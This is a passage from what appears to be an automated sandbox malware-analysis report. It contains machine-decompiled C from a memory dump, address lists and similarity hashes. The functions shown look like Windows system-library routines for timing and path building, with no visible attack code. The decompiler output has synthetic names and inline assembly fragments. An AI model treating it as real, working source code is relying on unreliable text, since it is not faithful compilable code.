                                                        									_t351 = _t272 & 0x3f;
                                                        									__eflags = _t351;
                                                        									goto L85;
                                                        								}
                                                        							}
                                                        							_t378 = _t452 + 0x9c;
                                                        							_t453 =  *_t378;
                                                        							goto L65;
                                                        						}
                                                        					}
                                                        					_t393 = E018A433B(__edx, __ecx, __ecx, _t453, __eflags);
                                                        					__eflags = _t393;
                                                        					if(_t393 != 0) {
                                                        						goto L5;
                                                        					} else {
                                                        						_v12 = 0xc000000d;
                                                        						goto L193;
                                                        					}
                                                        				} else {
                                                        					_t453 =  *0x18d5724; // 0x0
                                                        					 *0x18db1e0(__ecx, __edx);
                                                        					_t265 =  *_t453();
                                                        					L201:
                                                        					return E0182B640(_t265, _t395, _v8 ^ _t455, _t441, _t452, _t453);
                                                        				}
                                                        			}
                                                        0x0188efb8
                                                        0x0188efb8
                                                        0x0188efa1
                                                        0x0188efa9
                                                        0x0188efa9
                                                        0x0188f025
                                                        0x0188f02b
                                                        0x0188f031
                                                        0x0188f035
                                                        0x0188f038
                                                        0x0188f03b
                                                        0x0188f049
                                                        0x0188f04c
                                                        0x0188f05f
                                                        0x0188f061
                                                        0x0188f06b
                                                        0x0188f06d
                                                        0x0188f096
                                                        0x0188f09a
                                                        0x0188f0ab
                                                        0x0188f09c
                                                        0x0188f09c
                                                        0x0188f09e
                                                        0x0188f0a1
                                                        0x0188f0a3
                                                        0x0188f0a3
                                                        0x0188f0a3
                                                        0x0188f0a6
                                                        0x0188f0a6
                                                        0x0188f06f
                                                        0x0188f07c
                                                        0x0188f07e
                                                        0x0188f081
                                                        0x0188f08c
                                                        0x0188f08c
                                                        0x0188f08e
                                                        0x0188f083
                                                        0x0188f083
                                                        0x0188f083
                                                        0x0188f090
                                                        0x0188f090
                                                        0x0188f0b4
                                                        0x0188f063
                                                        0x0188f066
                                                        0x0188f066
                                                        0x0188f04e
                                                        0x0188f054
                                                        0x0188f054
                                                        0x0188f03d
                                                        0x0188f045
                                                        0x0188f045
                                                        0x0188f0b8
                                                        0x0188f0be
                                                        0x0188f0bf
                                                        0x0188f0c2
                                                        0x0188f0c4
                                                        0x0188f0c6
                                                        0x0188f0c6
                                                        0x0188f0c9
                                                        0x00000000
                                                        0x0188f0c9
                                                        0x0188ef54
                                                        0x00000000
                                                        0x0188ef54
                                                        0x0188ef2a
                                                        0x0188ef21
                                                        0x0188ef21
                                                        0x00000000
                                                        0x0188ef21
                                                        0x0188ef1e
                                                        0x0188ef1e
                                                        0x00000000
                                                        0x0188eedb
                                                        0x0188eedc
                                                        0x0188eede
                                                        0x0188eee0
                                                        0x0188eee5
                                                        0x0188eee7
                                                        0x0188eeff
                                                        0x00000000
                                                        0x0188eeff
                                                        0x0188eeee
                                                        0x0188eef2
                                                        0x00000000
                                                        0x00000000
                                                        0x0188eca2
                                                        0x0188eca4
                                                        0x0188eca5
                                                        0x0188eca5
                                                        0x0188ecab
                                                        0x0188ecb5
                                                        0x0188ecb5
                                                        0x0188ecad
                                                        0x0188ecad
                                                        0x0188ecad
                                                        0x0188ecb7
                                                        0x0188ecb9
                                                        0x0188ecd8
                                                        0x0188ecd8
                                                        0x0188ecdc
                                                        0x0188ecde
                                                        0x0188ed59
                                                        0x0188ed5c
                                                        0x0188ed60
                                                        0x0188ed71
                                                        0x0188ed62
                                                        0x0188ed62
                                                        0x0188ed64
                                                        0x0188ed67
                                                        0x0188ed69
                                                        0x0188ed69
                                                        0x0188ed69
                                                        0x0188ed6c
                                                        0x0188ed6c
                                                        0x0188ed74
                                                        0x0188ed77
                                                        0x0188ed79
                                                        0x0188ed93
                                                        0x0188ed7b
                                                        0x0188ed8b
                                                        0x0188ed8b
                                                        0x0188ed95
                                                        0x0188ed97
                                                        0x0188f237
                                                        0x0188f237
                                                        0x00000000
                                                        0x0188ed9d
                                                        0x0188ed9d
                                                        0x0188eda1
                                                        0x0188ee8a
                                                        0x0188ee8d
                                                        0x0188ee8d
                                                        0x00000000
                                                        0x0188ee8d
                                                        0x0188eda7
                                                        0x0188edaf
                                                        0x0188edb2
                                                        0x0188ee73
                                                        0x0188ee78
                                                        0x0188ee7c
                                                        0x0188ee7e
                                                        0x0188ee81
                                                        0x00000000
                                                        0x0188ee81
                                                        0x0188edb8
                                                        0x0188edc1
                                                        0x0188edc3
                                                        0x0188edcd
                                                        0x0188edcf
                                                        0x0188edd0
                                                        0x0188edd0
                                                        0x0188edd0
                                                        0x00000000
                                                        0x0188edd0
                                                        0x0188edc7
                                                        0x0188edca
                                                        0x00000000
                                                        0x0188edca
                                                        0x0188ed97
                                                        0x0188ece0
                                                        0x0188ece3
                                                        0x0188ece7
                                                        0x0188ecf0
                                                        0x0188ecf0
                                                        0x0188ecf0
                                                        0x0188ecf5
                                                        0x0188ecf8
                                                        0x0188ed08
                                                        0x0188ed0b
                                                        0x0188ed0d
                                                        0x0188ed2a
                                                        0x0188ed0f
                                                        0x0188ed1d
                                                        0x0188ed1f
                                                        0x0188ed22
                                                        0x0188ed22
                                                        0x0188ed2c
                                                        0x0188ed2e
                                                        0x00000000
                                                        0x0188ed34
                                                        0x0188ed34
                                                        0x0188ed37
                                                        0x00000000
                                                        0x00000000
                                                        0x0188ed39
                                                        0x0188ed3d
                                                        0x0188ed4e
                                                        0x0188ed3f
                                                        0x0188ed3f
                                                        0x0188ed41
                                                        0x0188ed44
                                                        0x0188ed46
                                                        0x0188ed46
                                                        0x0188ed46
                                                        0x0188ed49
                                                        0x0188ed49
                                                        0x0188ed51
                                                        0x00000000
                                                        0x0188ed51
                                                        0x0188ecfa
                                                        0x0188ecfa
                                                        0x0188ecfd
                                                        0x0188ede0
                                                        0x0188ede0
                                                        0x0188ede2
                                                        0x0188ef5d
                                                        0x00000000
                                                        0x0188ef5d
                                                        0x0188ede8
                                                        0x00000000
                                                        0x0188ede8
                                                        0x0188ecbb
                                                        0x0188ecbc
                                                        0x0188ecc0
                                                        0x0188ecc5
                                                        0x0188ecc7
                                                        0x00000000
                                                        0x00000000
                                                        0x0188ecce
                                                        0x0188ecd2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0188ecd2
                                                        0x0188ecb9
                                                        0x0188eed9
                                                        0x0188eeae
                                                        0x0188eea5
                                                        0x0188eea5
                                                        0x00000000
                                                        0x0188eea5
                                                        0x0188eea2
                                                        0x0188eea2
                                                        0x00000000
                                                        0x0188eea2
                                                        0x0188ee04
                                                        0x0188edd8
                                                        0x0188edde
                                                        0x00000000
                                                        0x0188edde
                                                        0x0188ebfb
                                                        0x0188ebdb
                                                        0x0188ebe0
                                                        0x0188ebe2
                                                        0x00000000
                                                        0x0188ebe4
                                                        0x0188ebe4
                                                        0x00000000
                                                        0x0188ebe4
                                                        0x0188ebac
                                                        0x0188ebac
                                                        0x0188ebb6
                                                        0x0188ebbc
                                                        0x0188f283
                                                        0x0188f293
                                                        0x0188f293

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: d3e442fcfb224a7512f3702d69e331446fbe010e6430369b2960c33f0ae5411c
                                                        • Instruction ID: 5709cfcffe15838f3278f2c8b09ab9571c3f2f6364ea973b77c7a786a8b19406
                                                        • Opcode Fuzzy Hash: d3e442fcfb224a7512f3702d69e331446fbe010e6430369b2960c33f0ae5411c
                                                        • Instruction Fuzzy Hash: 2532F474614655DBEB25EF2DC080372BBE1FF45304F08849AEA86CF286D735EA56CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 76%
                                                        			E0180B944(signed int* __ecx, char __edx) {
                                                        				signed int _v8;
                                                        				signed int _v16;
                                                        				signed int _v20;
                                                        				char _v28;
                                                        				signed int _v32;
                                                        				char _v36;
                                                        				signed int _v40;
                                                        				intOrPtr _v44;
                                                        				signed int* _v48;
                                                        				signed int _v52;
                                                        				signed int _v56;
                                                        				intOrPtr _v60;
                                                        				intOrPtr _v64;
                                                        				intOrPtr _v68;
                                                        				intOrPtr _v72;
                                                        				intOrPtr _v76;
                                                        				char _v77;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				intOrPtr* _t65;
                                                        				intOrPtr _t67;
                                                        				intOrPtr _t68;
                                                        				char* _t73;
                                                        				intOrPtr _t77;
                                                        				intOrPtr _t78;
                                                        				signed int _t82;
                                                        				intOrPtr _t83;
                                                        				void* _t87;
                                                        				char _t88;
                                                        				intOrPtr* _t89;
                                                        				intOrPtr _t91;
                                                        				void* _t97;
                                                        				intOrPtr _t100;
                                                        				void* _t102;
                                                        				void* _t107;
                                                        				signed int _t108;
                                                        				intOrPtr* _t112;
                                                        				void* _t113;
                                                        				intOrPtr* _t114;
                                                        				intOrPtr _t115;
                                                        				intOrPtr _t116;
                                                        				intOrPtr _t117;
                                                        				signed int _t118;
                                                        				void* _t130;
                                                        
                                                        				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                        				_v8 =  *0x18dd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                        				_t112 = __ecx;
                                                        				_v77 = __edx;
                                                        				_v48 = __ecx;
                                                        				_v28 = 0;
                                                        				_t5 = _t112 + 0xc; // 0x575651ff
                                                        				_t105 =  *_t5;
                                                        				_v20 = 0;
                                                        				_v16 = 0;
                                                        				if(_t105 == 0) {
                                                        					_t50 = _t112 + 4; // 0x5de58b5b
                                                        					_t60 =  *__ecx |  *_t50;
                                                        					if(( *__ecx |  *_t50) != 0) {
                                                        						 *__ecx = 0;
                                                        						__ecx[1] = 0;
                                                        						if(E01807D50() != 0) {
                                                        							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                        						} else {
                                                        							_t65 = 0x7ffe0386;
                                                        						}
                                                        						if( *_t65 != 0) {
                                                        							E018B8CD6(_t112);
                                                        						}
                                                        						_push(0);
                                                        						_t52 = _t112 + 0x10; // 0x778df98b
                                                        						_push( *_t52);
                                                        						_t60 = E01829E20();
                                                        					}
                                                        					L20:
                                                        					_pop(_t107);
                                                        					_pop(_t113);
                                                        					_pop(_t87);
                                                        					return E0182B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                        				}
                                                        				_t8 = _t112 + 8; // 0x8b000cc2
                                                        				_t67 =  *_t8;
                                                        				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                        				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                        				_t108 =  *(_t67 + 0x14);
                                                        				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                        				_t105 = 0x2710;
                                                        				asm("sbb eax, edi");
                                                        				_v44 = _t88;
                                                        				_v52 = _t108;
                                                        				_t60 = E0182CE00(_t97, _t68, 0x2710, 0);
                                                        				_v56 = _t60;
                                                        				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                        					L3:
                                                        					 *(_t112 + 0x44) = _t60;
                                                        					_t105 = _t60 * 0x2710 >> 0x20;
                                                        					 *_t112 = _t88;
                                                        					 *(_t112 + 4) = _t108;
                                                        					_v20 = _t60 * 0x2710;
                                                        					_v16 = _t60 * 0x2710 >> 0x20;
                                                        					if(_v77 != 0) {
                                                        						L16:
                                                        						_v36 = _t88;
                                                        						_v32 = _t108;
                                                        						if(E01807D50() != 0) {
                                                        							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                        						} else {
                                                        							_t73 = 0x7ffe0386;
                                                        						}
                                                        						if( *_t73 != 0) {
                                                        							_t105 = _v40;
                                                        							E018B8F6A(_t112, _v40, _t88, _t108);
                                                        						}
                                                        						_push( &_v28);
                                                        						_push(0);
                                                        						_push( &_v36);
                                                        						_t48 = _t112 + 0x10; // 0x778df98b
                                                        						_push( *_t48);
                                                        						_t60 = E0182AF60();
                                                        						goto L20;
                                                        					} else {
                                                        						_t89 = 0x7ffe03b0;
                                                        						do {
                                                        							_t114 = 0x7ffe0010;
                                                        							do {
                                                        								_t77 =  *0x18d8628; // 0x0
                                                        								_v68 = _t77;
                                                        								_t78 =  *0x18d862c; // 0x0
                                                        								_v64 = _t78;
                                                        								_v72 =  *_t89;
                                                        								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                        								while(1) {
                                                        									_t105 =  *0x7ffe000c;
                                                        									_t100 =  *0x7ffe0008;
                                                        									if(_t105 ==  *_t114) {
                                                        										goto L8;
                                                        									}
                                                        									asm("pause");
                                                        								}
                                                        								L8:
                                                        								_t89 = 0x7ffe03b0;
                                                        								_t115 =  *0x7ffe03b0;
                                                        								_t82 =  *0x7FFE03B4;
                                                        								_v60 = _t115;
                                                        								_t114 = 0x7ffe0010;
                                                        								_v56 = _t82;
                                                        							} while (_v72 != _t115 || _v76 != _t82);
                                                        							_t83 =  *0x18d8628; // 0x0
                                                        							_t116 =  *0x18d862c; // 0x0
                                                        							_v76 = _t116;
                                                        							_t117 = _v68;
                                                        						} while (_t117 != _t83 || _v64 != _v76);
                                                        						asm("sbb edx, [esp+0x24]");
                                                        						_t102 = _t100 - _v60 - _t117;
                                                        						_t112 = _v48;
                                                        						_t91 = _v44;
                                                        						asm("sbb edx, eax");
                                                        						_t130 = _t105 - _v52;
                                                        						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                        							_t88 = _t102 - _t91;
                                                        							asm("sbb edx, edi");
                                                        							_t108 = _t105;
                                                        						} else {
                                                        							_t88 = 0;
                                                        							_t108 = 0;
                                                        						}
                                                        						goto L16;
                                                        					}
                                                        				} else {
                                                        					if( *(_t112 + 0x44) == _t60) {
                                                        						goto L20;
                                                        					}
                                                        					goto L3;
                                                        				}
                                                        			}

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0180B9A5
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID:
                                                        • API String ID: 885266447-0
                                                        • Opcode ID: e82c2b877d1c636917b791de2707b27a761a36610fc252c256a41690deffef33
                                                        • Instruction ID: 03efc727d04b57f63af43a326c084c3a39d28b7dd02048c3b6e1f4c2bd4ae0eb
                                                        • Opcode Fuzzy Hash: e82c2b877d1c636917b791de2707b27a761a36610fc252c256a41690deffef33
                                                        • Instruction Fuzzy Hash: 68516A75609349CFC762CF6CC88092ABBE5FB88714F14496EE995C7385D730EA40CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 84%
                                                        			E01812581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
                                                        				signed int _v8;
                                                        				signed int _v16;
                                                        				unsigned int _v24;
                                                        				void* _v28;
                                                        				signed int _v32;
                                                        				unsigned int _v36;
                                                        				signed int _v37;
                                                        				signed int _v40;
                                                        				signed int _v44;
                                                        				signed int _v48;
                                                        				signed int _v52;
                                                        				signed int _v56;
                                                        				intOrPtr _v60;
                                                        				signed int _v64;
                                                        				signed int _v68;
                                                        				signed int _v72;
                                                        				signed int _v76;
                                                        				signed int _v80;
                                                        				signed int _t238;
                                                        				signed int _t242;
                                                        				void* _t243;
                                                        				signed int _t248;
                                                        				signed int _t250;
                                                        				intOrPtr _t252;
                                                        				signed int _t255;
                                                        				signed int _t262;
                                                        				signed int _t265;
                                                        				signed int _t273;
                                                        				signed int _t279;
                                                        				signed int _t281;
                                                        				void* _t283;
                                                        				void* _t284;
                                                        				signed int _t285;
                                                        				unsigned int _t288;
                                                        				signed int _t292;
                                                        				signed int* _t293;
                                                        				signed int _t294;
                                                        				signed int _t298;
                                                        				intOrPtr _t310;
                                                        				signed int _t319;
                                                        				signed int _t321;
                                                        				signed int _t322;
                                                        				signed int _t326;
                                                        				signed int _t327;
                                                        				void* _t331;
                                                        				signed int _t332;
                                                        				signed int _t334;
                                                        				signed int _t336;
                                                        				void* _t337;
                                                        				signed int _t339;
                                                        
                                                        				_t334 = _t336;
                                                        				_t337 = _t336 - 0x4c;
                                                        				_v8 =  *0x18dd360 ^ _t334;
                                                        				_push(__ebx);
                                                        				_push(__esi);
                                                        				_push(__edi);
                                                        				_t326 = 0x18db2e8;
                                                        				_v56 = _a4;
                                                        				_v48 = __edx;
                                                        				_v60 = __ecx;
                                                        				_t288 = 0;
                                                        				_v80 = 0;
                                                        				asm("movsd");
                                                        				_v64 = 0;
                                                        				_v76 = 0;
                                                        				_v72 = 0;
                                                        				asm("movsd");
                                                        				_v44 = 0;
                                                        				_v52 = 0;
                                                        				_v68 = 0;
                                                        				asm("movsd");
                                                        				_v32 = 0;
                                                        				_v36 = 0;
                                                        				asm("movsd");
                                                        				_v16 = 0;
                                                        				_t279 = 0x48;
                                                        				_t308 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                                        				_t319 = 0;
                                                        				_v37 = _t308;
                                                        				if(_v48 <= 0) {
                                                        					L16:
                                                        					_t45 = _t279 - 0x48; // 0x0
                                                        					__eflags = _t45 - 0xfffe;
                                                        					if(_t45 > 0xfffe) {
                                                        						_t327 = 0xc0000106;
                                                        						goto L32;
                                                        					} else {
                                                        						_t326 = E01804620(_t288,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t279);
                                                        						_v52 = _t326;
                                                        						__eflags = _t326;
                                                        						if(_t326 == 0) {
                                                        							_t327 = 0xc0000017;
                                                        							goto L32;
                                                        						} else {
                                                        							 *(_t326 + 0x44) =  *(_t326 + 0x44) & 0x00000000;
                                                        							_t50 = _t326 + 0x48; // 0x48
                                                        							_t321 = _t50;
                                                        							_t308 = _v32;
                                                        							 *(_t326 + 0x3c) = _t279;
                                                        							_t281 = 0;
                                                        							 *((short*)(_t326 + 0x30)) = _v48;
                                                        							__eflags = _t308;
                                                        							if(_t308 != 0) {
                                                        								 *(_t326 + 0x18) = _t321;
                                                        								__eflags = _t308 - 0x18d8478;
                                                        								 *_t326 = ((0 | _t308 == 0x018d8478) - 0x00000001 & 0xfffffffb) + 7;
                                                        								E0182F3E0(_t321,  *((intOrPtr*)(_t308 + 4)),  *_t308 & 0x0000ffff);
                                                        								_t308 = _v32;
                                                        								_t337 = _t337 + 0xc;
                                                        								_t281 = 1;
                                                        								__eflags = _a8;
                                                        								_t321 = _t321 + (( *_t308 & 0x0000ffff) >> 1) * 2;
                                                        								if(_a8 != 0) {
                                                        									_t273 = E018739F2(_t321);
                                                        									_t308 = _v32;
                                                        									_t321 = _t273;
                                                        								}
                                                        							}
                                                        							_t292 = 0;
                                                        							_v16 = 0;
                                                        							__eflags = _v48;
                                                        							if(_v48 <= 0) {
                                                        								L31:
                                                        								_t327 = _v68;
                                                        								__eflags = 0;
                                                        								 *((short*)(_t321 - 2)) = 0;
                                                        								goto L32;
                                                        							} else {
                                                        								_t279 = _t326 + _t281 * 4;
                                                        								_v56 = _t279;
                                                        								do {
                                                        									__eflags = _t308;
                                                        									if(_t308 != 0) {
                                                        										_t238 =  *(_v60 + _t292 * 4);
                                                        										__eflags = _t238;
                                                        										if(_t238 == 0) {
                                                        											goto L30;
                                                        										} else {
                                                        											__eflags = _t238 == 5;
                                                        											if(_t238 == 5) {
                                                        												goto L30;
                                                        											} else {
                                                        												goto L22;
                                                        											}
                                                        										}
                                                        									} else {
                                                        										L22:
                                                        										 *_t279 =  *(_v60 + _t292 * 4);
                                                        										 *(_t279 + 0x18) = _t321;
                                                        										_t242 =  *(_v60 + _t292 * 4);
                                                        										__eflags = _t242 - 8;
                                                        										if(_t242 > 8) {
                                                        											goto L56;
                                                        										} else {
                                                        											switch( *((intOrPtr*)(_t242 * 4 +  &M01812959))) {
                                                        												case 0:
                                                        													__ax =  *0x18d8488;
                                                        													__eflags = __ax;
                                                        													if(__ax == 0) {
                                                        														goto L29;
                                                        													} else {
                                                        														__ax & 0x0000ffff = E0182F3E0(__edi,  *0x18d848c, __ax & 0x0000ffff);
                                                        														__eax =  *0x18d8488 & 0x0000ffff;
                                                        														goto L26;
                                                        													}
                                                        													goto L108;
                                                        												case 1:
                                                        													L45:
                                                        													E0182F3E0(_t321, _v80, _v64);
                                                        													_t268 = _v64;
                                                        													goto L26;
                                                        												case 2:
                                                        													 *0x18d8480 & 0x0000ffff = E0182F3E0(__edi,  *0x18d8484,  *0x18d8480 & 0x0000ffff);
                                                        													__eax =  *0x18d8480 & 0x0000ffff;
                                                        													__eax = ( *0x18d8480 & 0x0000ffff) >> 1;
                                                        													__edi = __edi + __eax * 2;
                                                        													goto L28;
                                                        												case 3:
                                                        													__eax = _v44;
                                                        													__eflags = __eax;
                                                        													if(__eax == 0) {
                                                        														goto L29;
                                                        													} else {
                                                        														__esi = __eax + __eax;
                                                        														__eax = E0182F3E0(__edi, _v72, __esi);
                                                        														__edi = __edi + __esi;
                                                        														__esi = _v52;
                                                        														goto L27;
                                                        													}
                                                        													goto L108;
                                                        												case 4:
                                                        													_push(0x2e);
                                                        													_pop(__eax);
                                                        													 *(__esi + 0x44) = __edi;
                                                        													 *__edi = __ax;
                                                        													__edi = __edi + 4;
                                                        													_push(0x3b);
                                                        													_pop(__eax);
                                                        													 *(__edi - 2) = __ax;
                                                        													goto L29;
                                                        												case 5:
                                                        													__eflags = _v36;
                                                        													if(_v36 == 0) {
                                                        														goto L45;
                                                        													} else {
                                                        														E0182F3E0(_t321, _v76, _v36);
                                                        														_t268 = _v36;
                                                        													}
                                                        													L26:
                                                        													_t337 = _t337 + 0xc;
                                                        													_t321 = _t321 + (_t268 >> 1) * 2 + 2;
                                                        													__eflags = _t321;
                                                        													L27:
                                                        													_push(0x3b);
                                                        													_pop(_t270);
                                                        													 *((short*)(_t321 - 2)) = _t270;
                                                        													goto L28;
                                                        												case 6:
                                                        													__ebx =  *0x18d575c;
                                                        													__eflags = __ebx - 0x18d575c;
                                                        													if(__ebx != 0x18d575c) {
                                                        														_push(0x3b);
                                                        														_pop(__esi);
                                                        														do {
                                                        															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                        															E0182F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                        															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                        															__edi = __edi + __eax * 2;
                                                        															__edi = __edi + 2;
                                                        															 *(__edi - 2) = __si;
                                                        															__ebx =  *__ebx;
                                                        															__eflags = __ebx - 0x18d575c;
                                                        														} while (__ebx != 0x18d575c);
                                                        														__esi = _v52;
                                                        														__ecx = _v16;
                                                        														__edx = _v32;
                                                        													}
                                                        													__ebx = _v56;
                                                        													goto L29;
                                                        												case 7:
                                                        													 *0x18d8478 & 0x0000ffff = E0182F3E0(__edi,  *0x18d847c,  *0x18d8478 & 0x0000ffff);
                                                        													__eax =  *0x18d8478 & 0x0000ffff;
                                                        													__eax = ( *0x18d8478 & 0x0000ffff) >> 1;
                                                        													__eflags = _a8;
                                                        													__edi = __edi + __eax * 2;
                                                        													if(_a8 != 0) {
                                                        														__ecx = __edi;
                                                        														__eax = E018739F2(__ecx);
                                                        														__edi = __eax;
                                                        													}
                                                        													goto L28;
                                                        												case 8:
                                                        													__eax = 0;
                                                        													 *(__edi - 2) = __ax;
                                                        													 *0x18d6e58 & 0x0000ffff = E0182F3E0(__edi,  *0x18d6e5c,  *0x18d6e58 & 0x0000ffff);
                                                        													 *(__esi + 0x38) = __edi;
                                                        													__eax =  *0x18d6e58 & 0x0000ffff;
                                                        													__eax = ( *0x18d6e58 & 0x0000ffff) >> 1;
                                                        													__edi = __edi + __eax * 2;
                                                        													__edi = __edi + 2;
                                                        													L28:
                                                        													_t292 = _v16;
                                                        													_t308 = _v32;
                                                        													L29:
                                                        													_t279 = _t279 + 4;
                                                        													__eflags = _t279;
                                                        													_v56 = _t279;
                                                        													goto L30;
                                                        											}
                                                        										}
                                                        									}
                                                        									goto L108;
                                                        									L30:
                                                        									_t292 = _t292 + 1;
                                                        									_v16 = _t292;
                                                        									__eflags = _t292 - _v48;
                                                        								} while (_t292 < _v48);
                                                        								goto L31;
                                                        							}
                                                        						}
                                                        					}
                                                        				} else {
                                                        					while(1) {
                                                        						L1:
                                                        						_t242 =  *(_v60 + _t319 * 4);
                                                        						if(_t242 > 8) {
                                                        							break;
                                                        						}
                                                        						switch( *((intOrPtr*)(_t242 * 4 +  &M01812935))) {
                                                        							case 0:
                                                        								__ax =  *0x18d8488;
                                                        								__eflags = __ax;
                                                        								if(__ax != 0) {
                                                        									__eax = __ax & 0x0000ffff;
                                                        									__ebx = __ebx + 2;
                                                        									__eflags = __ebx;
                                                        									goto L53;
                                                        								}
                                                        								goto L14;
                                                        							case 1:
                                                        								L44:
                                                        								_t308 =  &_v64;
                                                        								_v80 = E01812E3E(0,  &_v64);
                                                        								_t279 = _t279 + _v64 + 2;
                                                        								goto L13;
                                                        							case 2:
                                                        								__eax =  *0x18d8480 & 0x0000ffff;
                                                        								__ebx = __ebx + __eax;
                                                        								__eflags = __dl;
                                                        								if(__dl != 0) {
                                                        									__eax = 0x18d8480;
                                                        									goto L80;
                                                        								}
                                                        								goto L14;
                                                        							case 3:
                                                        								__eax = E017FEEF0(0x18d79a0);
                                                        								__eax =  &_v44;
                                                        								_push(__eax);
                                                        								_push(0);
                                                        								_push(0);
                                                        								_push(4);
                                                        								_push(L"PATH");
                                                        								_push(0);
                                                        								L57();
                                                        								__esi = __eax;
                                                        								_v68 = __esi;
                                                        								__eflags = __esi - 0xc0000023;
                                                        								if(__esi != 0xc0000023) {
                                                        									L10:
                                                        									__eax = E017FEB70(__ecx, 0x18d79a0);
                                                        									__eflags = __esi - 0xc0000100;
                                                        									if(__esi == 0xc0000100) {
                                                        										_v44 = _v44 & 0x00000000;
                                                        										__eax = 0;
                                                        										_v68 = 0;
                                                        										goto L13;
                                                        									} else {
                                                        										__eflags = __esi;
                                                        										if(__esi < 0) {
                                                        											L32:
                                                        											_t216 = _v72;
                                                        											__eflags = _t216;
                                                        											if(_t216 != 0) {
                                                        												L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
                                                        											}
                                                        											_t217 = _v52;
                                                        											__eflags = _t217;
                                                        											if(_t217 != 0) {
                                                        												__eflags = _t327;
                                                        												if(_t327 < 0) {
                                                        													L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t217);
                                                        													_t217 = 0;
                                                        												}
                                                        											}
                                                        											goto L36;
                                                        										} else {
                                                        											__eax = _v44;
                                                        											__ebx = __ebx + __eax * 2;
                                                        											__ebx = __ebx + 2;
                                                        											__eflags = __ebx;
                                                        											L13:
                                                        											_t288 = _v36;
                                                        											goto L14;
                                                        										}
                                                        									}
                                                        								} else {
                                                        									__eax = _v44;
                                                        									__ecx =  *0x18d7b9c; // 0x0
                                                        									_v44 + _v44 =  *[fs:0x30];
                                                        									__ecx = __ecx + 0x180000;
                                                        									__eax = E01804620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                        									_v72 = __eax;
                                                        									__eflags = __eax;
                                                        									if(__eax == 0) {
                                                        										__eax = E017FEB70(__ecx, 0x18d79a0);
                                                        										__eax = _v52;
                                                        										L36:
                                                        										_pop(_t320);
                                                        										_pop(_t328);
                                                        										__eflags = _v8 ^ _t334;
                                                        										_pop(_t280);
                                                        										return E0182B640(_t217, _t280, _v8 ^ _t334, _t308, _t320, _t328);
                                                        									} else {
                                                        										__ecx =  &_v44;
                                                        										_push(__ecx);
                                                        										_push(_v44);
                                                        										_push(__eax);
                                                        										_push(4);
                                                        										_push(L"PATH");
                                                        										_push(0);
                                                        										L57();
                                                        										__esi = __eax;
                                                        										_v68 = __eax;
                                                        										goto L10;
                                                        									}
                                                        								}
                                                        								goto L108;
                                                        							case 4:
                                                        								__ebx = __ebx + 4;
                                                        								goto L14;
                                                        							case 5:
                                                        								_t275 = _v56;
                                                        								if(_v56 != 0) {
                                                        									_t308 =  &_v36;
                                                        									_t277 = E01812E3E(_t275,  &_v36);
                                                        									_t288 = _v36;
                                                        									_v76 = _t277;
                                                        								}
                                                        								if(_t288 == 0) {
                                                        									goto L44;
                                                        								} else {
                                                        									_t279 = _t279 + 2 + _t288;
                                                        								}
                                                        								goto L14;
                                                        							case 6:
                                                        								__eax =  *0x18d5764 & 0x0000ffff;
                                                        								goto L53;
                                                        							case 7:
                                                        								__eax =  *0x18d8478 & 0x0000ffff;
                                                        								__ebx = __ebx + __eax;
                                                        								__eflags = _a8;
                                                        								if(_a8 != 0) {
                                                        									__ebx = __ebx + 0x16;
                                                        									__ebx = __ebx + __eax;
                                                        								}
                                                        								__eflags = __dl;
                                                        								if(__dl != 0) {
                                                        									__eax = 0x18d8478;
                                                        									L80:
                                                        									_v32 = __eax;
                                                        								}
                                                        								goto L14;
                                                        							case 8:
                                                        								__eax =  *0x18d6e58 & 0x0000ffff;
                                                        								__eax = ( *0x18d6e58 & 0x0000ffff) + 2;
                                                        								L53:
                                                        								__ebx = __ebx + __eax;
                                                        								L14:
                                                        								_t319 = _t319 + 1;
                                                        								if(_t319 >= _v48) {
                                                        									goto L16;
                                                        								} else {
                                                        									_t308 = _v37;
